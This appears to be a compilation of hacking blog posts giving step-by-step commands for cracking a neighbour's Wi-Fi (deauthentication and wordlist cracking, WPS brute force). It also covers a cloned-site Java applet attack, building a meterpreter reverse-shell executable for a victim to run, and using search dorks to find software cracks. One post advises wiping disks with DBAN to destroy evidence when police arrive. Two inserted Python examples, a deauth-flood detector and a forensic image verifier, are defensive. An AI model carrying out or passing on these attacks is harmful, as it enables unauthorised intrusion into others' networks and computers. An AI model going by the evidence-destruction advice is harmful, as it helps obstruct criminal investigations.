How I met your neighbor!!!!

There are 2 ways to hack a wireless network; both of them require mon0 (monitor mode) if you are not associated and authenticated to the network (connected).

Things that you might need:-

  1. Kali Linux on VMware.
  2. D-Link dw-123 (or any other wireless card that supports monitor mode).

Dictionary attack:-
A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase from hundreds or sometimes millions of likely possibilities, such as words in a dictionary.


How to?

  1. Open a new terminal in Kali Linux, type airmon-ng start wlan0 and hit enter; here wlan0 can be replaced by the interface name of your card.
  2. Now type airodump-ng mon0 and hit enter to get the list of networks in your range.
  3. Now type airodump-ng --bssid target's bssid -c channel number --write filename mon0 and hit enter to capture the packets of the target router.
  4. Now, in a new terminal window, type aireplay-ng -0 5 --ignore-negative-one -a essid -c client essid mon0 to kick the user off and make him authenticate once again, which gives us an authentication frame.
  5. Now press Ctrl+C to stop the first terminal, or close both terminals.
  6. Now type aircrack-ng -w path to wordlist filename.cap and hit enter to crack the hash.

Limitations:-

If the password is not in the word-list then you cannot crack it.
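The deauthentication step above is not silent: the network owner sees a burst of 802.11 deauthentication frames against one BSSID that would otherwise send at most the odd one. As an added example (not code from the original post), here is a small Python detector that parses raw management-frame headers from a constructed capture and raises an alert when a BSSID receives more deauths than a threshold inside a sliding window; the frame bytes, MAC addresses and timestamps are all constructed for the demonstration.

```python
import struct
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12   # 802.11 management subtype 12 = deauthentication (frame-control byte 0 = 0xC0)

def parse_mgmt_frame(frame: bytes):
    """Return (subtype, addr1, addr2, bssid, reason_code) for an 802.11 management
    frame, or None for data/control frames and truncated headers."""
    if len(frame) < 24 or frame[0] & 0x0C:      # type bits (2-3) must be 00 = management
        return None
    subtype = (frame[0] >> 4) & 0x0F
    addr1, addr2, bssid = (frame[i:i + 6].hex(":") for i in (4, 10, 16))
    reason = None
    if subtype == DEAUTH_SUBTYPE and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]   # reason code right after the 24-byte header
    return subtype, addr1, addr2, bssid, reason

def detect_deauth_flood(frames, threshold=4, window=2.0):
    """frames: iterable of (timestamp_seconds, raw_frame). An AP legitimately sends the odd
    deauth; a burst against one BSSID in a short window is the signature of a forced reconnect.
    Returns a (timestamp, bssid, count) alert each time a BSSID crosses the threshold."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed is None or parsed[0] != DEAUTH_SUBTYPE:
            continue
        bssid = parsed[3]
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:                # slide the window forward
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerts.append((ts, bssid, len(q)))
            alerted.add(bssid)
        elif len(q) < threshold:
            alerted.discard(bssid)               # quiet again: re-arm for the next burst
    return alerts

def make_mgmt(fc0: int, dst: str, src: str, bssid: str, body: bytes = b"") -> bytes:
    """Build a minimal management frame: FC, duration, addr1-3, sequence control, body."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    return bytes([fc0, 0x00, 0x3A, 0x01]) + mac(dst) + mac(src) + mac(bssid) + b"\x00\x00" + body

# Constructed capture (not real traffic): a beacon, five deauths within 0.4 s, then one stray deauth.
AP, CLIENT = "02:00:00:00:aa:01", "02:00:00:00:cc:01"
DEAUTH = make_mgmt(0xC0, CLIENT, AP, AP, struct.pack("<H", 7))   # reason code 7
SAMPLE_CAPTURE = ([(0.0, make_mgmt(0x80, "ff:ff:ff:ff:ff:ff", AP, AP))]
                  + [(t, DEAUTH) for t in (1.0, 1.1, 1.2, 1.3, 1.4)] + [(30.0, DEAUTH)])
```

Running detect_deauth_flood(SAMPLE_CAPTURE) yields a single alert at 1.3 s for the AP's BSSID; the lone deauth at 30 s never reaches the threshold, which is what keeps ordinary AP housekeeping from paging anyone.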

Brute force attack:-
A brute force attack aims at being the simplest kind of method to gain access to a site: it tries usernames and passwords, over and over again, until it gets in.

How to?
  1. Open a new terminal in Kali Linux, type airmon-ng start wlan0 and hit enter; here wlan0 can be replaced by the interface name of your card.
  2. Now type airodump-ng mon0 to get the list of networks in your range.
  3. Now, to deploy reaver, type reaver -i mon0 -b bssid -vv and hit enter; after a few minutes or hours you will get the WPS key and WPA key of the router.
Limitation:-
It takes a lot of time to crack the password and requires stable traffic on the network. Routers with WPS disabled, or that lock WPS after repeated failed PIN attempts, are not affected.



Monitor mode (mon0)

Introduction:-
Wireless cards have 6 different modes, each with its own functionality:-
  1. Managed (client)
  2. Master (router)
  3. Ad-hoc (peer to peer)
  4. Mesh (planned ad-hoc)
  5. Repeater (Wi-Fi extender)
  6. Monitor
Monitor mode is a special mode available in some wireless cards that allows you to sniff packets which are being sent from the router to the client even when you are not associated and authenticated to the network. You can also use it to authenticate the user who is associated and authenticated to the network. In other words it is like spying on all the networks in your range.
  
How to check your card?
Open a terminal, type iw phy phy0 info | grep -A8 modes and hit enter. Here phy0 can be replaced with phy1, phy2, phy3, etc. depending on your system. To find out which one, type airmon-ng and hit enter in the terminal.

How to switch it on?
To enable monitor mode, type ifconfig and hit enter in your terminal. It will give you a list of your interfaces; note down the wireless interface name, in our case it was wlan0. Now type airmon-ng start wlan0 and hit enter to start monitor mode on your wireless card.

Is it working?
To check whether the mon0 interface is working or not, type tshark -i mon0 and hit enter.

What is its use?
This mode is required for all sorts of Wi-Fi hacking and sniffing.

Note:-
In our tests and hacks we are using a D-Link dw-123 Wi-Fi dongle.

When cops are at your door step!

When it comes to cyber crime, evidence can decide whether you will end up in jail or walk out of the case with ease. From our past experience we have learned that just by deleting files you can't undo what you have done; there are methods and tools to retrieve deleted data. Thus we decided to find a way to delete everything which can help the investigators prove you are guilty. DBAN (Darik's Boot and Nuke) is a Linux distribution designed to erase all the data and traces of it from the drive. It is a self-contained boot image that securely wipes the hard disks of most computers. DBAN is appropriate for bulk or emergency data destruction.

How to?

  1. Download the ISO file and create a bootable CD or drive.
  2. Once you are done, plug the drive or the CD into your PC and restart it.
  3. Once DBAN boots up, type autonuke or quick and hit enter.
  4. Your disks will be wiped clean.

Note:-

Autonuke will delete the ISO burned on the disk as well if you are using a pen-drive. You can hit F3 to get the list of all the commands.


Java applet attack with SET

All browsers run Java applets, which can be used to gain access to the system. The beauty of such attacks is that the exploit code never touches the disk, so such an attack can't be detected by the antivirus. Except Mac, all the operating systems are vulnerable to such attacks.

How to?

  1. Open the terminal, type service postgresql start and hit enter, then type service metasploit start and hit enter.
  2. Now type setoolkit and hit enter.
  3. Now select option 1 and hit enter.
  4. Now select option 2, which is website attack vectors, and hit enter.
  5. Now select option 1, which is the Java applet one, and hit enter.
  6. Now hit 2, which is site cloner, and enter. Then enter your IP address (remember, the Ethernet one).
  7. Now select your payload and backdoor according to your target.
  8. Now, on another terminal, type msfconsole and hit enter, then type use exploit/multi/handler and hit enter; now set the payload with the set payload command, set the port and IP with the set command, and start the multi handler listener.



Note:-
When the user goes to the link he or she will be prompted with the message shown below until he or she clicks install.


Port Scan: The easy way

Port scanning is a technique to scan a system for open ports which can be used for exploitation. This can be considered the first step of hacking. This process can sometimes be more technical, but we would like you to learn the easy way to do it.

How to?
Android:-
  1. In Fing, you can scan the ports just by selecting the host machine and then Service Scan.
  2. In Landroid, you can select port scan, enter the IP of the target and then select Go.
  3. In Dsploit, you can select the host and then select port scanner.


Kali Linux:-
  1. Open the terminal, type zenmap (a GUI for nmap) and hit enter.
  2. Now in the target box type the target's IP, select the scan type and hit scan.

Note:- If the system detects the scan, or port discovery is off, then you will not get results.

Hacking Windows machines

Hacking Windows computers has always been the first thing you want to learn when you go into penetration testing, as 3 of every 5 computers in the world are running Windows. We don't intend to harm the reputation of Microsoft, but hacking a Windows computer that doesn't have any protection from third-party software is quite easy.

What you need?
Kali Linux on VMware.

How to?
  1. Open a new terminal window, type ifconfig and hit enter. Note down the eth0 IP address.
  2. Now type msfpayload windows/meterpreter/reverse_tcp lhost=ip x > hcak.exe and hit enter. You can change the file name to anything you want instead of hcak.exe.
  3. Now type service postgresql start and hit enter, then type service metasploit start and hit enter.
  4. Now type msfconsole and hit enter.
  5. Now type use exploit/multi/handler and hit enter; after that type set payload windows/meterpreter/reverse_tcp to set the payload for meterpreter.
  6. Now set the lhost by typing set lhost ip. Then type exploit and hit enter.
  7. Now wait till the victim runs the exe file, after which you can connect to the victim.

Note:-
If the victim is protected by any fairly good antivirus then this method will fail.

Google Hacks

Google hacks, also known as Google dorks, are specific keywords which can be used to dig out more details in a regular Google search query.

Now, there are millions of such keywords; we cannot discuss each of them in a single post. So we will discuss the most commonly used ones.

  1. inurl: This keyword can be used to find URLs of multiple sites having a certain URL query.
  2. filetype: This keyword is used to look for a specific file type on the net.
  3. intitle: This keyword is used to find URLs with a specific word in the title.
  4. 94fbr: This keyword can be used to find serial keys (cracks) of software.




For more hacks you can refer to the GHDB of exploit-db.com.

Note:-

We are using Chrome in our demonstration for optimized results, but you can use any browser as long as it connects to Google's search engine.


Creating a disk image: 1st step in digital forensics

A disk image is a virtual image of a storage device which functions like an actual physical drive. Creating one is the first step in digital forensics. In other words, you don't want to contaminate the evidence with your shit. This can also be used to recover a complete disk.


How to?
Windows:-
  1. Download Winimage and install it.
  2. Run it with administrative privilege and click OK.
  3. Now click on Disk and then click on "Create virtual hard disk image from physical drive".
  4. Now select your drive, click on OK and select the path of the directory in which you would like to save the disk image.

Linux:-
  1. Open a terminal, type fdisk -l and hit enter.
  2. Now note the drive name.
  3. Now type dcfldd if=drive name of=file.dd and hit enter, replacing drive name with the drive you noted.
  4. Now type ls and hit enter to see whether the file has been created or not.
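dcfldd is preferred over plain dd for imaging because it can hash the data while it copies, and an image only counts as evidence if that hash can be reproduced from both the source and the image afterwards. As an added example (not code from the original post), the Python below carries out that workflow on a constructed "device" (a temporary file standing in for /dev/sdb, never a real disk): copy in fixed blocks, hash during acquisition, then independently re-hash source and image and compare sizes and digests; the tamper flag shows what a single altered byte does to the verdict.

```python
import hashlib
import os
import tempfile

BLOCK = 4096   # copy in fixed blocks like dd's bs=; forensic tools use much larger blocks

def image_device(src_path: str, dst_path: str, block_size: int = BLOCK) -> dict:
    """Copy src_path to dst_path block by block, hashing every byte as it is written
    (what dcfldd's hash= option does). Returns the byte count and the acquisition hash."""
    h, written = hashlib.sha256(), 0
    with open(src_path, "rb") as src, open(dst_path, "wb") as dst:
        for chunk in iter(lambda: src.read(block_size), b""):
            h.update(chunk)
            dst.write(chunk)
            written += len(chunk)
    return {"bytes": written, "sha256": h.hexdigest()}

def sha256_file(path: str, block_size: int = BLOCK) -> str:
    """Independent re-read of a file; used to re-hash source and image after acquisition."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(block_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_image(src_path: str, dst_path: str, acquisition: dict) -> bool:
    """The image is only usable as evidence if the source re-hash, the image re-hash and the
    hash taken during acquisition agree, and all three sizes match."""
    sizes = {os.path.getsize(src_path), os.path.getsize(dst_path), acquisition["bytes"]}
    digests = {sha256_file(src_path), sha256_file(dst_path), acquisition["sha256"]}
    return len(sizes) == 1 and len(digests) == 1

def acquire(device_content: bytes, tamper: bool = False):
    """Image a constructed 'device' (a temp file standing in for /dev/sdb, not a real disk)
    and verify it. tamper=True flips the first byte of the image afterwards to show the
    check fail. Returns (verified, acquisition_record)."""
    with tempfile.TemporaryDirectory() as d:
        src, dst = os.path.join(d, "sdb"), os.path.join(d, "evidence.dd")
        with open(src, "wb") as f:
            f.write(device_content)
        acq = image_device(src, dst)
        if tamper:
            with open(dst, "r+b") as f:
                f.seek(0)
                f.write(bytes([device_content[0] ^ 0xFF]))   # guaranteed to differ from the original
        return verify_image(src, dst, acq), acq
```

The sample content is deliberately not a multiple of the block size, so the last short read is exercised; on a real acquisition the same three-way comparison is what you record in the chain-of-custody notes next to the image.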

Note:-
The file created by Winimage has a .vhd extension and the file created on Kali Linux has a .dd extension. Similarly, if you use other programs then the extension may vary. The only thing you need to keep in mind is that you should be sure of the extensions which your forensics tool supports.